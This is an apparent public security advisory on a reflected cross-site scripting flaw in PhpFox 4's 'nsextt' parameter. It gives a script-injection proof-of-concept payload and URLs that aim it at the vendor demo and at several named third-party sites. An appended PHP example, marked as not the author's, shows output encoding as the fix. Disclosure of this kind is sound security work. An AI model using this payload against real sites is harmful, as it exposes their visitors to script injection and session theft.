PHPFox version 4 suffers from a cross site scripting vulnerability.
###########################################
# Title : PhpFox4 Cross Site Scripting Vuln.
# Author : bl4ck_MohajeM ( mohajem.war@gmail.com)
# Software Link: http://www.phpfox.com/
# Version: 4
# Date : 06/09/2016
# Category: WebApps
# Tested with : Ubuntu / Win
###########################################
[Description]
In this CMS there is a cross-site scripting vulnerability in the
'nsextt' parameter.
PhpFox takes the value of this parameter from the client without
applying any PHP anti-XSS function.
Vuln. Input ==> /?nsextt=
###########################################
[Proof of Concept]
Use this in place of '/?nsextt=':
/?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
You will then see an alert that contains '209'.
###########################################
[Example]
https://v4.phpfox.com/v/category/69/comedy/?nsextt=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x0000D1)%3C/scRipt%3E
https://v4.phpfox.com/blog/
https://v4.phpfox.com/photo/
https://v4.phpfox.com/forum/
https://v4.phpfox.com/poll/
https://v4.phpfox.com/quiz/
https://v4.phpfox.com/event/
https://v4.phpfox.com/music/
https://v4.phpfox.com/marketplace/
https://v4.phpfox.com/pages/
https://v4.phpfox.com/invite/
demo :
tabrizcloob.ir/forum//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
alachikh.ir/poll//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
facebook2.ir/event//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
avs.ir/music//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
###########################################
[Solution]
The programmer should encode the data received from clients.
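
Which encoding applies depends on where the value lands in the page. The following is an added example, not PHPFox code and not the author's: the function names and the surrounding markup are assumptions, since the advisory does not show how PHPFox reflects 'nsextt'.

```php
<?php
declare(strict_types=1);

// Constructed input: the advisory's PoC value as it would arrive in $_GET['nsextt'].
$nsextt = '\'"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>';

// Assumed vulnerable pattern: the raw value is concatenated into markup.
function reflect_raw(string $v): string
{
    return '<a href="/blog/?nsextt=' . $v . '">next</a>';
}

// HTML text and quoted-attribute contexts: encode & < > " and '.
function html_encode(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// URL inside an attribute: percent-encode the value, then HTML-encode the result.
function reflect_href(string $v): string
{
    return '<a href="/blog/?nsextt=' . html_encode(rawurlencode($v)) . '">next</a>';
}

// Inline script context: emit a JSON string with < > & ' " as \uXXXX escapes,
// so the value cannot close the string or the surrounding <script> element.
function reflect_js(string $v): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR;
    return '<script>var nsextt = ' . json_encode($v, $flags) . ';</script>';
}

// The PoC also tries to close <style> and an HTML comment; client data should
// not be reflected into those contexts at all.
$outputs = [
    'raw'  => reflect_raw($nsextt),
    'text' => '<p>' . html_encode($nsextt) . '</p>',
    'href' => reflect_href($nsextt),
    'js'   => reflect_js($nsextt),
];

foreach ($outputs as $name => $out) {
    // A surviving "<scRipt>" means the payload's markup reached the page intact.
    $state = strpos($out, '<scRipt>') !== false ? 'payload intact' : 'neutralised';
    echo str_pad($name, 5), $state, PHP_EOL, '  ', $out, PHP_EOL;
}
```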
###########################################
tnx : sha4yan - arf1372 - Milad Hacking - n1arash - Und3rgrounD -
shabgard - b3hz4d
###########################################